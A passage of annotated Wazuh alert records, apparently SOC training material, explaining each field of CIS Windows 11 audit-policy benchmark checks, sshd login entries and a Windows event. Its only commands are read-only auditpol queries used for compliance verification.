location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.5.6'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] Maps to the CIS Critical Security Controls (CIS CSC) – the control‑level counterpart of the rule.cis benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534647.2346388 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26156 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Special Logon' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.5.6 CIS benchmark control this single check implements – same value as rule.cis above.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check supports – same value as rule.cis_csc above.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Special Logon"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] Maps to the CIS Critical Security Controls (CIS CSC) – the control‑level counterpart of the rule.cis benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534650.2349020 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26157 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Detailed File Share' is set to include 'Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.1 CIS benchmark control this single check implements – same value as rule.cis above.
data.sca.check.compliance.cis_csc: 3.3,8.5 CIS Critical Security Controls safeguards this check supports – same values as rule.cis_csc above.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Detailed File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] Maps to the CIS Critical Security Controls (CIS CSC) – the control‑level counterpart of the rule.cis benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534653.2351868 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26158 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit File Share' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.2 CIS benchmark control this single check implements – same value as rule.cis above.
data.sca.check.compliance.cis_csc: 3.3,8.5 CIS Critical Security Controls safeguards this check supports – same values as rule.cis_csc above.
data.sca.check.command: ['auditpol.exe /get /subcategory:"File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534654.2354908 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:13.230035+00:00 server1 sshd[3349]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:13.230035+00:00 Timestamp the pre‑decoder lifted from the raw log line – matches the leading timestamp in full_log.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba Target user account of the event – here the user whose SSH session was closed.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] Maps to the CIS Critical Security Controls (CIS CSC) – the control‑level counterpart of the rule.cis benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534659.2355301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26159 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.3 CIS benchmark control this single check implements – same value as rule.cis above.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check supports – same value as rule.cis_csc above.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Other Object Access Events"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534662.2358595 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP ETW provider that emitted the event – the Windows component to attribute the message to.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} GUID of that provider – stable across renames, so prefer it for filters.
data.win.system.eventSourceName: Software Protection Platform Service Legacy event source name, as shown in Event Viewer.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 Event schema version for this event ID.
data.win.system.level: 4 Numeric level of the event (1 = Critical, 2 = Error, 3 = Warning, 4 = Information, 5 = Verbose) – here Information, matching severityValue below.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:43:17.4781170Z UTC time the event was written on the source host – use it, not the alert id, for timeline ordering.
data.win.system.eventRecordID: 2419 Incremental log record number – handy for timeline order.
data.win.system.processID: 16152 PID of the process that logged the event.
data.win.system.threadID: 0 Thread ID within that process – 0 when the source did not record one.
data.win.system.channel: Application Windows event log channel the event was written to (Application, Security, System, or a provider‑specific channel).
data.win.system.computer: Attacker Computer name recorded in the event – should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:17Z. Reason: RulesEngine." Rendered event message text – the human‑readable form of the EventData below.
data.win.eventdata.data: 2025-04-25T22:31:17Z, RulesEngine Raw EventData values of the event – here the scheduled restart time and the reason.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534664.2360177 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:23.581338+00:00 server1 sshd[3411]: Accepted password for simba from 192.168.6.135 port 42842 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:23.581338+00:00 Timestamp the pre‑decoder lifted from the raw log line – matches the leading timestamp in full_log.
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 Source IP parsed from the log line – the host the SSH login came from; pairs with data.srcport.
data.srcport: 42842 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba Target user account of the event – here the account that was logged into.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534664.2360644 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:23.585709+00:00 server1 sshd[3411]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:23.585709+00:00 Timestamp the pre‑decoder lifted from the raw log line – matches the leading timestamp in full_log.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) Target user account of the event, as PAM wrote it (name plus uid) – here the user whose session was opened.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] Maps to the CIS Critical Security Controls (CIS CSC) – the control‑level counterpart of the rule.cis benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534665.2361103 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26160 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Removable Storage' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.4 Section number of this check in the CIS benchmark named in data.sca.policy. Search on it to find the same control in other benchmark versions.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check maps to (8.5 sits under Control 8, Audit Log Management).
data.sca.check.command: ['auditpol.exe /get /subcategory:"Removable Storage"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed One of passed, failed or not applicable. failed means the auditpol output did not match the expected setting; open a remediation ticket with the text above.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] CIS Critical Security Controls safeguard the rule maps to (8.5 sits under Control 8, Audit Log Management); mirrors data.sca.check.compliance.cis_csc.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534672.2364815 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check carries one benchmark test's result, summary carries the totals for the whole scan.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26161 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Audit Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.1 Section number of this check in the CIS benchmark named in data.sca.policy.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls safeguard this check maps to (Control 8, Audit Log Management).
data.sca.check.command: ['auditpol.exe /get /subcategory:"Audit Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed One of passed, failed or not applicable. passed means the subcategory already includes Success; nothing to do.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] CIS Critical Security Controls safeguard the rule maps to (Control 8, Audit Log Management); mirrors data.sca.check.compliance.cis_csc.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534672.2368099 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check carries one benchmark test's result, summary carries the totals for the whole scan.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26162 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authentication Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
